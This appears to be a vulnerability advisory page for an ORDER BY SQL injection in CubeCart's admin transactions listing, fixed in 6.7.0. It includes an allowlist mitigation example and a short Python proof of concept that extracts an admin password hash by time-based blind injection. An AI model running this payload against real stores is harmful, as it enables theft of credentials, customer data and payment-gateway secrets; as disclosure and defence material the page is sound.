Security Vulnerability Report
CVE-2026-45054 CVSS 4.9 MEDIUM

CVE-2026-45054

Published: 2026-05-13 21:16:49
Last Modified: 2026-05-14 16:49:19

Description

CubeCart is an ecommerce software solution. Prior to 6.7.0, the admin orders-transactions listing page (admin.php?_g=orders&node=transactions) builds a raw ORDER BY SQL fragment from the attacker-controlled $_GET['sort'] array without column or direction validation. Both the column key and the direction value flow into the query string as bare SQL tokens, and the framework's sqlSafe() (mysqli escape_string) escapes only quote characters, none of which are required for ORDER BY injection. An authenticated administrator with the minimum CC_PERM_READ permission on orders can execute arbitrary SQL against the store database, including time-based blind extraction of admin password hashes, customer PII, and integrated payment-gateway credentials. This vulnerability is fixed in 6.7.0.
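
The root cause described above is that request-supplied sort keys and directions are concatenated into SQL as bare tokens, a position where quote escaping offers no protection. The following added example (written for this report; it is not CubeCart's code and does not reproduce its source) contrasts that pattern with the standard mitigation: every ORDER BY token is taken from a server-side allowlist, and anything else fails closed. The column map, the PHP-style sort[...] parsing and the sample query strings are constructed for illustration.

```python
# Added example (not CubeCart's code): allowlisted ORDER BY construction as a
# mitigation for the sort-parameter injection pattern described in the advisory.
from urllib.parse import parse_qs

# Constructed allowlist: request-facing sort keys -> fixed SQL column identifiers.
# Nothing from the request is ever copied into the SQL text; only the lookup result is.
ALLOWED_SORT_COLUMNS = {
    "time": "`time`",
    "amount": "`amount`",
    "status": "`status`",
    "order_id": "`cart_order_id`",
}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def naive_order_by(sort):
    """The risky pattern: request keys and values land in SQL as bare tokens.

    Generic illustration of what the advisory describes, shown only to contrast
    with safe_order_by(). Escaping quotes would not change these tokens at all.
    """
    return "ORDER BY " + ", ".join(f"{col} {direction}" for col, direction in sort.items())


def safe_order_by(sort, allowed_columns=ALLOWED_SORT_COLUMNS):
    """Build an ORDER BY clause where every token comes from a server-side allowlist.

    `sort` maps request key -> direction. Unknown columns or directions raise
    ValueError so the request is rejected before any SQL is assembled.
    """
    if not sort:
        return ""
    parts = []
    for key, direction in sort.items():
        column = allowed_columns.get(key)
        if column is None:
            raise ValueError(f"unknown sort column: {key!r}")
        direction = str(direction).strip().upper()
        if direction not in ALLOWED_DIRECTIONS:
            raise ValueError(f"invalid sort direction: {direction!r}")
        parts.append(f"{column} {direction}")
    return "ORDER BY " + ", ".join(parts)


def sort_from_query_string(query_string):
    """Extract PHP-style sort[...] parameters into a {key: direction} dict.

    PHP turns `sort[time]=DESC` into $_GET['sort']['time'] == 'DESC'; this mirrors
    that shape so the validation can be exercised on a raw query string.
    """
    sort = {}
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        if name.startswith("sort[") and name.endswith("]"):
            sort[name[5:-1]] = values[-1]
    return sort


def order_by_from_request(query_string):
    """Parse the query string and return the clause, or None when the request
    was rejected (meaning no SQL was built from it)."""
    try:
        return safe_order_by(sort_from_query_string(query_string))
    except ValueError:
        return None


if __name__ == "__main__":
    # Constructed benign request: both tokens resolve through the allowlist.
    print(order_by_from_request("_g=orders&node=transactions&sort[time]=DESC&sort[amount]=asc"))
    # Constructed hostile request in the shape the advisory describes: rejected (None).
    print(order_by_from_request("_g=orders&node=transactions&sort[0]=(SELECT SLEEP(5))"))
```

The key design point is that `safe_order_by()` never interpolates request data: the request key is only used to look up a fixed identifier, and the direction is compared against a two-element set. Validating this way also removes the need to reason about what `sqlSafe()`-style escaping does or does not cover in an ORDER BY position.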

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

CubeCart < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

target_url = "http://example.com/admin.php"
params = {
    "_g": "orders",
    "node": "transactions",
    "sort[0]": "(CASE WHEN (SELECT SUBSTRING(password,1,1) FROM CubeCart_admin_users WHERE admin_id=1)='a' THEN (SELECT SLEEP(5)) ELSE 1 END)",
}
cookies = {"PHPSESSID": "authenticated_session_id_here"}

response = requests.get(target_url, params=params, cookies=cookies)
if response.elapsed.total_seconds() > 5:
    print("Vulnerable: First character of hash is 'a'")
else:
    print("Not 'a'")

References

https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45054", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:49.270", "lastModified": "2026-05-14T16:49:18.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeCart is an ecommerce software solution. Prior to 6.7.0, the admin orders-transactions listing page (admin.php?_g=orders&node=transactions) builds a raw ORDER BY SQL fragment from the attacker-controlled $_GET['sort'] array without column or direction validation. Both the column key and the direction value flow into the query string as bare SQL tokens, and the framework's sqlSafe() (mysqli escape_string) escapes only quote characters — none of which are required for ORDER BY injection. An authenticated administrator with the minimum CC_PERM_READ permission on orders can execute arbitrary SQL against the store database, including time-based blind extraction of admin password hashes, customer PII, and integrated payment-gateway credentials. This vulnerability is fixed in 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f", "source": "[email protected]"}, {"url": "https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}